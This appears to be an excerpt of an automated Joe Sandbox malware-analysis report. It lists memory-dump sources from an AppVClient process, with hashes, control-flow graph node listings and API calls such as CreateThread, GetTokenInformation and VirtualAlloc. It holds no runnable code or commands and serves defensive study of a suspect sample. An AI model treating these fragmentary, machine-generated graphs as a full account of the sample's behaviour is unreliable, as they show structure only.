                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                          • Instruction ID: 83efe157c105de82a57e2abdc0ba2e9357f9c6440f07b9a3916b3359909ca1d5
                                                                                                                                                          • Opcode Fuzzy Hash: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                          • Instruction Fuzzy Hash: E14127A240DE908FCB36812458A43B56AD4DB673E2F5901D794C3CB2E6E1980F94E32B

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 ba81c0-ba81d8 1 ba83bf-ba83ca 0->1 2 ba81e5 0->2 16 ba83d0 1->16 17 ba8277-ba827a 1->17 3 ba81eb 2->3 4 ba82a3-ba82a5 2->4 7 ba82b2-ba82bc 3->7 8 ba81f1 3->8 5 ba82ab 4->5 6 ba83f9 4->6 5->6 10 ba82b1 5->10 14 ba83ff 6->14 15 ba82d2-ba82d7 6->15 11 ba8357-ba836f GetTokenInformation 7->11 12 ba82c5-ba82c8 7->12 8->7 13 ba81f7-ba828e 8->13 10->7 30 ba8376-ba837b 11->30 12->6 19 ba82ce 12->19 23 baf524-baf52e 14->23 18 ba8306-ba8309 15->18 16->17 24 ba83d6 16->24 21 ba827c 17->21 22 ba8241 17->22 26 ba830b-ba8311 CloseHandle 18->26 27 ba832e-ba8330 18->27 28 ba828f-ba8303 call bd72ec 19->28 29 ba82d0 19->29 21->22 31 ba827e 21->31 22->30 32 ba8251-ba8256 call bd72f4 22->32 25 baf807 23->25 34 baf8df-baf8e0 25->34 35 baf80d 25->35 26->27 39 ba82dd-ba82e3 27->39 40 ba8332 27->40 28->18 59 ba834f-ba8355 28->59 29->15 29->28 36 ba82f0-ba831c 30->36 37 ba8381 30->37 31->26 38 ba8284 31->38 49 ba825b-ba8260 32->49 52 bb15a5-bb15aa 34->52 35->34 43 baf813 35->43 36->2 61 ba8322 36->61 37->36 46 ba8387 37->46 38->27 44 ba82e9 39->44 45 ba83a3-ba83a4 39->45 40->39 48 ba8334 40->48 55 baf81b 43->55 56 baf78f 43->56 44->45 53 ba82ef 44->53 45->23 46->17 54 ba8390-ba8393 46->54 48->23 49->54 58 bb15ae-bb15af 52->58 53->36 54->31 57 ba8399 54->57 55->34 56->55 62 baf795 56->62 57->31 63 ba839f-ba83a1 57->63 65 bb15b2-bb15b7 58->65 67 ba8212-ba821a GetTokenInformation 59->67 68 ba8341 59->68 61->2 66 ba8328-ba832c 61->66 62->25 63->45 69 bb15ba-bb15c1 65->69 66->12 66->27 71 ba83af 67->71 72 ba8220-ba8234 67->72 68->67 70 ba8347 68->70 73 bb1750-bb17a2 call bd72f4 69->73 74 bb15c7-bb15d2 69->74 75 bb1638-bb1640 70->75 76 ba834d 70->76 71->32 77 ba83b5 71->77 105 ba823a 72->105 106 ba83d7-ba83dd 72->106 80 bb1620-bb1623 74->80 81 bb15d4-bb15d6 74->81 84 bb170e-bb1727 75->84 85 bb1646-bb165f 75->85 76->59 77->32 86 ba83bb-ba83bd 77->86 82 bb16a0-bb16b4 80->82 83 bb1625-bb1628 80->83 88 bb15dc-bb15df 81->88 89 bb1670-bb1684 81->89 94 bb16b6-bb16b9 82->94 95 bb16f4-bb16f5 82->95 83->69 90 bb162a-bb1636 83->90 84->74 91 bb172d 84->91 85->74 92 bb1665 85->92 86->1 88->69 97 bb15e1-bb15f6 88->97 89->52 93 bb168a-bb168d 89->93 90->75 100 bb16dc-bb16ec 90->100 91->73 92->73 101 bb172f-bb1738 93->101 102 bb1693-bb1697 93->102 103 bb16bb 94->103 104 bb173a-bb173b 94->104 108 bb16fe-bb170c 95->108 98 bb15fc-bb1600 97->98 99 bb16d2-bb16d7 97->99 98->108 109 bb1606-bb1618 98->109 99->58 100->74 110 bb16f2 100->110 111 bb173f-bb1740 101->111 112 bb16bf-bb16cd 102->112 103->112 104->111 105->106 107 ba8240 105->107 106->6 113 bbb32e-bbb330 107->113 115 bb1744-bb1748 108->115 109->65 110->73 111->115 116 bbb332-bbb337 call bd72f4 113->116 117 bbb300 113->117 116->117 125 bbb339 116->125 121 bbb2fd 117->121 122 bbb302 117->122 123 bbb2ff 121->123 124 bbb305 121->124 126 bbb308-bbb315 123->126 124->126 127 bbb322-bbb32d 124->127 125->117 128 bbb33b-bbb33f 125->128 126->124 130 bbb317 126->130 127->113 128->126 130->121
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                          • Instruction ID: 4f6e2cf214cd21e0d2df8a1e8edd2f81887acacc55dc5b1919d0fee5e78debba
                                                                                                                                                          • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                          • Instruction Fuzzy Hash: 26B1363050CF458BCB29CB1D84D07B9B7E2FFA6314F6886DAD48B87966DE649C02C356

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 131 ba5b8f-ba5c20 call bb53f0 call bd8358 call bc0320 call ba81c0 141 ba5c26 131->141 142 ba5cf4-ba5d08 call bd72ec 131->142 141->142 143 ba5c2c-ba5c2f 141->143 146 ba5d0e 142->146 147 ba5c87-ba5dc8 call ba5e60 call ba5990 142->147 146->147 149 ba5d14-ba5d18 146->149 159 ba5dcd 147->159 153 ba5daf-ba5db6 call ba52d0 149->153 154 ba5c65 149->154 165 ba5dbc 153->165 166 ba5c30-ba5c39 153->166 156 ba5ca3 call ba5df0 154->156 157 ba5c67 154->157 168 ba5c45-ba5d6d call bc1520 156->168 157->156 161 ba5c69-ba5c9d 157->161 159->159 179 ba5c9f 161->179 180 ba5c85 161->180 169 ba5dbe 165->169 170 ba5d7d-ba5d89 165->170 182 ba5cb9-ba5cbd 166->182 183 ba5bf7 166->183 188 ba5bfd-ba5c06 168->188 193 ba5d73 168->193 169->170 178 ba5d9b 169->178 176 ba5d8b-ba5d92 170->176 177 ba5d94 170->177 176->177 184 ba5d9c 176->184 177->143 191 ba5cb3 177->191 178->184 179->180 186 ba5ca1 179->186 180->147 189 ba5cc3 182->189 190 ba5d56-ba5d5b CreateThread 182->190 183->182 183->188 195 ba5da5-ba5da8 184->195 186->156 188->195 189->190 194 ba5cc9 189->194 197 ba5c7e 190->197 198 ba5d1f-ba5d45 190->198 191->143 191->182 193->188 199 ba5d79-ba5d7b 193->199 194->190 195->153 197->198 200 ba5c84 197->200 202 ba5d47 198->202 203 ba5cd4-ba5cea CreateThread CloseHandle 198->203 199->170 200->180 202->203 203->176 205 ba5cf0-ba5d4d 203->205 205->177
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction ID: 9beda4fffdfddacd0f1880c7d26718b3008aa31250b15a79c03c9971d3c551cd
                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction Fuzzy Hash: B641E92061CF098FDB789B2C9899B7976D1EB57330F5401FAD046CB1AAFE248F448756

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 207 ba5d22-ba5d45 208 ba5d47 207->208 209 ba5cd4-ba5cea CreateThread CloseHandle 207->209 208->209 211 ba5d8b-ba5d92 209->211 212 ba5cf0-ba5d4d 209->212 214 ba5d9c 211->214 215 ba5d94 211->215 212->215 217 ba5da5-ba5db6 call ba52d0 214->217 218 ba5c2c-ba5c2f 215->218 219 ba5cb3 215->219 230 ba5dbc 217->230 231 ba5c30-ba5c39 217->231 219->218 220 ba5cb9-ba5cbd 219->220 222 ba5cc3 220->222 223 ba5d56-ba5d5b CreateThread 220->223 222->223 226 ba5cc9 222->226 228 ba5c7e 223->228 229 ba5d1f-ba5d45 223->229 226->223 228->229 232 ba5c84-ba5dc8 call ba5e60 call ba5990 228->232 229->208 229->209 235 ba5dbe 230->235 236 ba5d7d-ba5d89 230->236 231->220 243 ba5bf7 231->243 250 ba5dcd 232->250 235->236 242 ba5d9b 235->242 236->211 236->215 242->214 243->220 245 ba5bfd-ba5c06 243->245 245->217 250->250
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction ID: 1f028b33a2ad9865b1eb1c81bfb92948fa83d47f5a25ca47be12072b74f4faf7
                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction Fuzzy Hash: 3BF0C22161CE0585DA3C9628889963A65C1E79B331F6407EAD096C90D8FE284B019245

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 251 ba5d50-ba5d5b CreateThread 252 ba5c78 251->252 253 ba5c7e 252->253 254 ba5d1f-ba5d45 252->254 253->254 255 ba5c84-ba5dc8 call ba5e60 call ba5990 253->255 257 ba5d47 254->257 258 ba5cd4-ba5cea CreateThread CloseHandle 254->258 276 ba5dcd 255->276 257->258 262 ba5d8b-ba5d92 258->262 263 ba5cf0-ba5d4d 258->263 266 ba5d9c 262->266 267 ba5d94 262->267 263->267 271 ba5da5-ba5db6 call ba52d0 266->271 272 ba5c2c-ba5c2f 267->272 273 ba5cb3 267->273 283 ba5dbc 271->283 284 ba5c30-ba5c39 271->284 273->272 275 ba5cb9-ba5cbd 273->275 278 ba5cc3 275->278 279 ba5d56-ba5d5b CreateThread 275->279 276->276 278->279 281 ba5cc9 278->281 279->252 281->279 286 ba5dbe 283->286 287 ba5d7d-ba5d89 283->287 284->275 292 ba5bf7 284->292 286->287 291 ba5d9b 286->291 287->262 287->267 291->266 292->275 293 ba5bfd-ba5c06 292->293 293->271
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction ID: 35b3871a8b989253918aef77bef8ab68e0abeab636c91a668db76c4b29011bbc
                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction Fuzzy Hash: EFB0120042EF876500361330148852809C4FE47334D741FFE8FF3069D6E8000F04E320

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 295 ba5990-ba599b 297 ba5a33-ba5a61 call bd9b00 295->297 298 ba59a1 295->298 307 ba5a63 297->307 308 ba5ab4-ba5aba call bc1080 297->308 298->297 300 ba59a7-ba59ab 298->300 303 ba5a59 300->303 304 ba59b1-ba59f3 call bd2320 300->304 309 ba5a5b 303->309 310 ba5a25-ba5a2d 303->310 304->303 325 ba59f5-ba59fa 304->325 307->308 312 ba5a65 307->312 328 ba5a83-ba5a88 call ba5df0 308->328 331 ba5a13 308->331 309->310 317 ba5a23 309->317 314 ba5a2f 310->314 315 ba5a70-ba5a7b 310->315 312->315 314->312 318 ba5a7d 315->318 319 ba5a16-ba5a1e call bc1470 315->319 323 ba5a24 317->323 318->319 324 ba5a7f-ba5a81 318->324 332 ba5a96-ba5ac2 319->332 324->328 329 ba59fc 325->329 330 ba5a51-ba5a54 call bd233c 325->330 337 ba5a8d VirtualAlloc 328->337 329->330 334 ba59fe-ba5a02 329->334 330->303 331->328 336 ba5a15 331->336 332->323 339 ba5ac8 332->339 334->330 336->319 337->332 339->323 340 ba5ace 339->340 340->297
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction ID: ab899d7f07e3f469659f84f3bd09ffdecdfaae063b0e25d40b84c7248ec18b11
                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction Fuzzy Hash: DA21EC3171DE888FD77A9318C4D17BA26E2F797324F5903DBD08ACB192D9284F059252

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 342 ba8245-ba8247 343 ba824d-ba824f 342->343 344 ba82d2-ba82d7 342->344 346 ba8251-ba8260 call bd72f4 343->346 345 ba8306-ba8309 344->345 347 ba830b-ba8311 CloseHandle 345->347 348 ba832e-ba8330 345->348 356 ba8390-ba8393 346->356 347->348 350 ba82dd-ba82e3 348->350 351 ba8332 348->351 353 ba82e9 350->353 354 ba83a3-ba83a4 350->354 351->350 355 ba8334 351->355 353->354 360 ba82ef 353->360 359 baf524-baf52e 354->359 355->359 357 ba8399 356->357 358 ba827e 356->358 357->358 362 ba839f-ba83a1 357->362 358->347 363 ba8284 358->363 361 baf807 359->361 366 ba82f0-ba831c 360->366 364 baf8df-baf8e0 361->364 365 baf80d 361->365 362->354 363->348 370 bb15a5-bb15aa 364->370 365->364 367 baf813 365->367 375 ba8322 366->375 376 ba81e5 366->376 371 baf81b 367->371 372 baf78f 367->372 373 bb15ae-bb15af 370->373 371->364 372->371 377 baf795 372->377 378 bb15b2-bb15b7 373->378 375->376 379 ba8328-ba832c 375->379 380 ba81eb 376->380 381 ba82a3-ba82a5 376->381 377->361 382 bb15ba-bb15c1 378->382 379->348 383 ba82c5-ba82c8 379->383 386 ba82b2-ba82bc 380->386 387 ba81f1 380->387 384 ba82ab 381->384 385 ba83f9 381->385 388 bb1750-bb17a2 call bd72f4 382->388 389 bb15c7-bb15d2 382->389 383->385 390 ba82ce 383->390 384->385 391 ba82b1 384->391 385->344 394 ba83ff 385->394 386->383 392 ba8357-ba836f GetTokenInformation 386->392 387->386 393 ba81f7-ba828e 387->393 396 bb1620-bb1623 389->396 397 bb15d4-bb15d6 389->397 398 ba828f-ba8303 call bd72ec 390->398 399 ba82d0 390->399 391->386 408 ba8376-ba837b 392->408 394->359 400 bb16a0-bb16b4 396->400 401 bb1625-bb1628 396->401 404 bb15dc-bb15df 397->404 405 bb1670-bb1684 397->405 398->345 436 ba834f-ba8355 398->436 399->344 399->398 410 bb16b6-bb16b9 400->410 411 bb16f4-bb16f5 400->411 401->382 407 bb162a-bb1636 401->407 404->382 412 bb15e1-bb15f6 404->412 405->370 409 bb168a-bb168d 405->409 416 bb1638-bb1640 407->416 417 bb16dc-bb16ec 407->417 408->366 418 ba8381 408->418 419 bb172f-bb1738 409->419 420 bb1693-bb1697 409->420 421 bb16bb 410->421 422 bb173a-bb173b 410->422 423 bb16fe-bb170c 411->423 413 bb15fc-bb1600 412->413 414 bb16d2-bb16d7 412->414 413->423 424 bb1606-bb1618 413->424 414->373 427 bb170e-bb1727 416->427 428 bb1646-bb165f 416->428 417->389 425 bb16f2 417->425 418->366 430 ba8387 418->430 429 bb173f-bb1740 419->429 431 bb16bf-bb16cd 420->431 421->431 422->429 432 bb1744-bb1748 423->432 424->378 425->388 427->389 433 bb172d 427->433 428->389 434 bb1665 428->434 429->432 430->356 435 ba8277-ba827a 430->435 433->388 434->388 438 ba827c 435->438 439 ba8241 435->439 440 ba8212-ba821a GetTokenInformation 436->440 441 ba8341 436->441 438->358 438->439 439->346 439->408 443 ba83af 440->443 444 ba8220-ba8234 440->444 441->440 442 ba8347 441->442 442->416 445 ba834d 442->445 443->346 446 ba83b5 443->446 451 ba823a 444->451 452 ba83d7-ba83dd 444->452 445->436 446->346 448 ba83bb-ba83ca 446->448 448->435 457 ba83d0 448->457 451->452 453 ba8240 451->453 452->385 455 bbb32e-bbb330 453->455 458 bbb332-bbb337 call bd72f4 455->458 459 bbb300 455->459 457->435 460 ba83d6 457->460 458->459 468 bbb339 458->468 464 bbb2fd 459->464 465 bbb302 459->465 466 bbb2ff 464->466 467 bbb305 464->467 469 bbb308-bbb315 466->469 467->469 470 bbb322-bbb32d 467->470 468->459 471 bbb33b-bbb33f 468->471 469->467 473 bbb317 469->473 470->455 471->469 473->464
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                          • Instruction ID: c32f5a31e16a6dfb9f93a154269bacafa7350e8a96ed97dbd329ce46286c3290
                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                          • Instruction Fuzzy Hash: 13F0283450DB82CFDA36979890A06BABBE0EF53700B5D00DAE48ACB913DE18CC01D792

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 605 ba83e7-ba83e9 606 ba83ef 605->606 607 ba82c5-ba82c8 605->607 606->607 610 ba83f5-ba83f7 606->610 608 ba83f9 607->608 609 ba82ce 607->609 613 ba83ff 608->613 614 ba82d2-ba82d7 608->614 611 ba828f-ba8303 call bd72ec 609->611 612 ba82d0 609->612 610->608 616 ba8306-ba8309 611->616 630 ba834f-ba8355 611->630 612->611 612->614 617 baf524-baf52e 613->617 614->616 620 ba830b-ba8311 CloseHandle 616->620 621 ba832e-ba8330 616->621 618 baf807 617->618 623 baf8df-baf8e0 618->623 624 baf80d 618->624 620->621 625 ba82dd-ba82e3 621->625 626 ba8332 621->626 634 bb15a5-bb15aa 623->634 624->623 627 baf813 624->627 628 ba82e9 625->628 629 ba83a3-ba83a4 625->629 626->625 631 ba8334 626->631 636 baf81b 627->636 637 baf78f 627->637 628->629 635 ba82ef 628->635 629->617 638 ba8212-ba821a GetTokenInformation 630->638 639 ba8341 630->639 631->617 640 bb15ae-bb15af 634->640 646 ba82f0-ba831c 635->646 636->623 637->636 641 baf795 637->641 643 ba83af 638->643 644 ba8220-ba8234 638->644 639->638 642 ba8347 639->642 645 bb15b2-bb15b7 640->645 641->618 647 bb1638-bb1640 642->647 648 ba834d 642->648 649 ba8251-ba8256 call bd72f4 643->649 650 ba83b5 643->650 677 ba823a 644->677 678 ba83d7-ba83dd 644->678 651 bb15ba-bb15c1 645->651 669 ba8322 646->669 670 ba81e5 646->670 654 bb170e-bb1727 647->654 655 bb1646-bb165f 647->655 648->630 666 ba825b-ba8260 649->666 650->649 656 ba83bb-ba83ca 650->656 657 bb1750-bb17a2 call bd72f4 651->657 658 bb15c7-bb15d2 651->658 654->658 660 bb172d 654->660 655->658 661 bb1665 655->661 705 ba83d0 656->705 706 ba8277-ba827a 656->706 664 bb1620-bb1623 658->664 665 bb15d4-bb15d6 658->665 660->657 661->657 671 bb16a0-bb16b4 664->671 672 bb1625-bb1628 664->672 674 bb15dc-bb15df 665->674 675 bb1670-bb1684 665->675 676 ba8390-ba8393 666->676 669->670 680 ba8328-ba832c 669->680 681 ba81eb 670->681 682 ba82a3-ba82a5 670->682 687 bb16b6-bb16b9 671->687 688 bb16f4-bb16f5 671->688 672->651 683 bb162a-bb1636 672->683 674->651 690 bb15e1-bb15f6 674->690 675->634 686 bb168a-bb168d 675->686 684 ba8399 676->684 685 ba827e 676->685 677->678 679 ba8240 677->679 678->608 693 bbb32e-bbb330 679->693 680->607 680->621 702 ba82b2-ba82bc 681->702 703 ba81f1 681->703 682->608 701 ba82ab 682->701 683->647 694 bb16dc-bb16ec 683->694 684->685 695 ba839f-ba83a1 684->695 685->620 704 ba8284 685->704 696 bb172f-bb1738 686->696 697 bb1693-bb1697 686->697 698 bb16bb 687->698 699 bb173a-bb173b 687->699 707 bb16fe-bb170c 688->707 691 bb15fc-bb1600 690->691 692 bb16d2-bb16d7 690->692 691->707 708 bb1606-bb1618 691->708 692->640 709 bbb332-bbb337 call bd72f4 693->709 710 bbb300 693->710 694->658 712 bb16f2 694->712 695->629 716 bb173f-bb1740 696->716 711 bb16bf-bb16cd 697->711 698->711 699->716 701->608 713 ba82b1 701->713 702->607 714 ba8357-ba836f GetTokenInformation 702->714 703->702 715 ba81f7-ba828e 703->715 704->621 705->706 719 ba83d6 705->719 717 ba827c 706->717 718 ba8241 706->718 723 bb1744-bb1748 707->723 708->645 709->710 731 bbb339 709->731 727 bbb2fd 710->727 728 bbb302 710->728 712->657 713->702 722 ba8376-ba837b 714->722 716->723 717->685 717->718 718->649 718->722 722->646 726 ba8381 722->726 726->646 732 ba8387 726->732 729 bbb2ff 727->729 730 bbb305 727->730 733 bbb308-bbb315 729->733 730->733 734 bbb322-bbb32d 730->734 731->710 735 bbb33b-bbb33f 731->735 732->676 732->706 733->730 737 bbb317 733->737 734->693 735->733 737->727
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction ID: 6434ce945617b5eb4325c18668c8a5849310aaa1ab22f39f9f2932e65ff9d497
                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0903450CB42DB8A35864494807762BE0EB63740B6C00D9D446CBD22DE28DC45E756

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 474 ba8318-ba831c 475 ba8322 474->475 476 ba81e5 474->476 475->476 477 ba8328-ba832c 475->477 478 ba81eb 476->478 479 ba82a3-ba82a5 476->479 480 ba832e-ba8330 477->480 481 ba82c5-ba82c8 477->481 484 ba82b2-ba82bc 478->484 485 ba81f1 478->485 482 ba82ab 479->482 483 ba83f9 479->483 492 ba82dd-ba82e3 480->492 493 ba8332 480->493 481->483 486 ba82ce 481->486 482->483 487 ba82b1 482->487 490 ba83ff 483->490 491 ba82d2-ba82d7 483->491 484->481 488 ba8357-ba836f GetTokenInformation 484->488 485->484 489 ba81f7-ba828e 485->489 495 ba828f-ba8303 call bd72ec 486->495 496 ba82d0 486->496 487->484 505 ba8376-ba837b 488->505 500 baf524-baf52e 490->500 494 ba8306-ba8309 491->494 498 ba82e9 492->498 499 ba83a3-ba83a4 492->499 493->492 501 ba8334 493->501 494->480 504 ba830b-ba8311 CloseHandle 494->504 495->494 520 ba834f-ba8355 495->520 496->491 496->495 498->499 506 ba82ef 498->506 499->500 503 baf807 500->503 501->500 508 baf8df-baf8e0 503->508 509 baf80d 503->509 504->480 510 ba82f0-ba831c 505->510 511 ba8381 505->511 506->510 517 bb15a5-bb15aa 508->517 509->508 513 baf813 509->513 510->475 510->476 511->510 514 ba8387 511->514 521 baf81b 513->521 522 baf78f 513->522 518 ba8390-ba8393 514->518 519 ba8277-ba827a 514->519 526 bb15ae-bb15af 517->526 523 ba8399 518->523 524 ba827e 518->524 527 ba827c 519->527 528 ba8241 519->528 531 ba8212-ba821a GetTokenInformation 520->531 532 ba8341 520->532 521->508 522->521 530 baf795 522->530 523->524 533 ba839f-ba83a1 523->533 524->504 535 ba8284 524->535 534 bb15b2-bb15b7 526->534 527->524 527->528 528->505 536 ba8251-ba8260 call bd72f4 528->536 530->503 538 ba83af 531->538 539 ba8220-ba8234 531->539 532->531 537 ba8347 532->537 533->499 540 bb15ba-bb15c1 534->540 535->480 536->518 542 bb1638-bb1640 537->542 543 ba834d 537->543 538->536 544 ba83b5 538->544 568 ba823a 539->568 569 ba83d7-ba83dd 539->569 546 bb1750-bb17a2 call bd72f4 540->546 547 bb15c7-bb15d2 540->547 549 bb170e-bb1727 542->549 550 bb1646-bb165f 542->550 543->520 544->536 551 ba83bb-ba83ca 544->551 553 bb1620-bb1623 547->553 554 bb15d4-bb15d6 547->554 549->547 557 bb172d 549->557 550->547 558 bb1665 550->558 551->519 587 ba83d0 551->587 555 bb16a0-bb16b4 553->555 556 bb1625-bb1628 553->556 562 bb15dc-bb15df 554->562 563 bb1670-bb1684 554->563 566 bb16b6-bb16b9 555->566 567 bb16f4-bb16f5 555->567 556->540 564 bb162a-bb1636 556->564 557->546 558->546 562->540 570 bb15e1-bb15f6 562->570 563->517 565 bb168a-bb168d 563->565 564->542 574 bb16dc-bb16ec 564->574 575 bb172f-bb1738 565->575 576 bb1693-bb1697 565->576 577 bb16bb 566->577 578 bb173a-bb173b 566->578 581 bb16fe-bb170c 567->581 568->569 571 ba8240 568->571 569->483 572 bb15fc-bb1600 570->572 573 bb16d2-bb16d7 570->573 580 bbb32e-bbb330 571->580 572->581 582 bb1606-bb1618 572->582 573->526 574->547 583 bb16f2 574->583 585 bb173f-bb1740 575->585 586 bb16bf-bb16cd 576->586 577->586 578->585 589 bbb332-bbb337 call bd72f4 580->589 590 bbb300 580->590 588 bb1744-bb1748 581->588 582->534 583->546 585->588 587->519 591 ba83d6 587->591 589->590 599 bbb339 589->599 595 bbb2fd 590->595 596 bbb302 590->596 597 bbb2ff 595->597 598 bbb305 595->598 600 bbb308-bbb315 597->600 598->600 601 bbb322-bbb32d 598->601 599->590 602 bbb33b-bbb33f 599->602 600->598 604 bbb317 600->604 601->580 602->600 604->595
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE ref: 00BA830B
                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00BA8369
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000007.00000002.1597041024.0000000000BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_7_2_ba0000_AppVClient.jbxd
